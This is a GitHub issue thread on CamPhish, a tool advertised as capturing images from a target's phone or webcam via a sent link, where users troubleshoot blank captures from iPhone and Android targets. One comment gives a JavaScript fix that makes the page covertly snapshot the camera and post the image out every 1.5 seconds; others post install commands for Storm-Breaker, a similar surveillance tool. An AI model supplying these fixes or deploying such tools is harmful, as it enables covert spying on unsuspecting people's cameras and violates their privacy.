techchipnet / CamPhish

Grab cam shots from target's phone front camera or PC webcam just sending a link.
GNU General Public License v3.0
2.97k stars 823 forks source link

Blank white png #107

Open Coordinate-Cat opened 2 years ago

Coordinate-Cat commented 2 years ago

Hi. I've been using your wonderful project. Thanks!

I'm currently trying to generate a png file targeting the iphone intercom, but it's not working. I can do it on macOS on my pc. On the iphone, it generates a png, but it's a blank png. Do you have any idea what might be causing this?

スクリーンショット 2022-02-27 15 42 12
ladoual commented 2 years ago

try storm breaker

zorks56 commented 2 years ago

hI, THE SAME PROBLEM I HAVE. i'M testing on Kali linux. i send link to iphone and android. In Both case i have always white PNG. How resolve? what's mean "break the storm"?

Coordinate-Cat commented 2 years ago

@zorks56 plz check email

Alex-Wong-HK commented 2 years ago

Same problem, pls help!!

Alex-Wong-HK commented 2 years ago

Fixed. festivalwishes.html and LiveYTTV.html is missing video.play() ;

var context = canvas.getContext('2d'); setInterval(function(){ video.play(); // add this context.drawImage(video, 0, 0, 640, 480); var canvasData = canvas.toDataURL("image/png").replace("image/png", "image/octet-stream"); post(canvasData); }, 1500); }

seraphim721 commented 2 years ago

hello did anybody find a solution ?

seraphim721 commented 2 years ago

nvm found it

https://github.com/ultrasecurity/Storm-Breaker

$ git clone https://github.com/ultrasecurity/Storm-Breaker $ cd Storm-Breaker $ sudo bash linux-installer.sh $ python3 -m pip install -r requirments.txt $ sudo python3 Storm-Breaker.py

eddapp commented 2 years ago

can you explain further etc

nathanr17 commented 2 years ago

The guy above has the right stuff just spelled wrong. Here's the correct one:

$ git clone https://github.com/ultrasecurity/Storm-Breaker $ cd Storm-Breaker $ sudo bash install.sh $ sudo python3 -m pip install -r requirements.txt $ sudo python3 st.py